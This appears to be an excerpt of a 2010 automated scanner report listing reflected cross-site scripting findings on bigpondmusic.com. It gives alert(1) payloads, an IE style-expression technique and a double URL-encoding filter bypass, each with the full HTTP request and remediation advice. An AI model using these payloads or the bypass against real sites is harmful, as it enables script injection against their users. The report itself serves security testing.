The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce7e'%3b39af1d7f4f7 was submitted in the REST URL parameter 2. This input was echoed as fce7e';39af1d7f4f7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/Albumsfce7e'%3b39af1d7f4f7/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:12:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88047
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5262b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06f403cc646 was submitted in the REST URL parameter 2. This input was echoed as 5262b"><script>alert(1)</script>06f403cc646 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums5262b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06f403cc646/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88486
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d34c'%3ba5781649f96 was submitted in the REST URL parameter 3. This input was echoed as 1d34c';a5781649f96 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/Albums/NewRelease1d34c'%3ba5781649f96/Format-Single/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88178
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14f30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757d1c7ef65f was submitted in the REST URL parameter 3. This input was echoed as 14f30'style='x:expression(alert(1))'57d1c7ef65f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease14f30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757d1c7ef65f/Format-Single/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88579
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caec7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e91020edd044 was submitted in the REST URL parameter 3. This input was echoed as caec7"><script>alert(1)</script>91020edd044 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewReleasecaec7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e91020edd044/Format-Single/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88575
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0463%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276ef5806c8ed was submitted in the REST URL parameter 4. This input was echoed as c0463'style='x:expression(alert(1))'6ef5806c8ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Singlec0463%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276ef5806c8ed/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e277163c8c81 was submitted in the REST URL parameter 4. This input was echoed as b0b15"><script>alert(1)</script>277163c8c81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Singleb0b15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e277163c8c81/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88265
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d151%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252701bd4018a0a was submitted in the REST URL parameter 5. This input was echoed as 4d151'style='x:expression(alert(1))'01bd4018a0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Single/By-ReleaseDate4d151%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252701bd4018a0a HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:13:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88395
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed92f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49c761395d was submitted in the REST URL parameter 5. This input was echoed as ed92f"><script>alert(1)</script>49c761395d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Single/By-ReleaseDateed92f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49c761395d HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88193
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d43b"style%3d"x%3aexpression(alert(1))"db3f590606e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d43b"style="x:expression(alert(1))"db3f590606e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /browse/Albums/NewRelease/Format-Single/By-ReleaseDate?6d43b"style%3d"x%3aexpression(alert(1))"db3f590606e=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 139032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 958d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53304c5ccd0 was submitted in the REST URL parameter 1. This input was echoed as 958d3"><script>alert(1)</script>53304c5ccd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /charts958d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53304c5ccd0/albums HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88116
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a25'%3b0bb2e82f779 was submitted in the REST URL parameter 1. This input was echoed as b6a25';0bb2e82f779 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /chartsb6a25'%3b0bb2e82f779/albums HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87784
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68ce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea302a26bbd6 was submitted in the REST URL parameter 2. This input was echoed as b68ce"><script>alert(1)</script>a302a26bbd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /charts/albumsb68ce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea302a26bbd6 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:12:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88247
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 371a8'%3bb65b865de00 was submitted in the REST URL parameter 2. This input was echoed as 371a8';b65b865de00 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /charts/albums371a8'%3bb65b865de00 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88439
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.256. http://bigpondmusic.com/charts/albums [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/charts/albums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16824"style%3d"x%3aexpression(alert(1))"37d26c23a91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16824"style="x:expression(alert(1))"37d26c23a91 in the application's response.
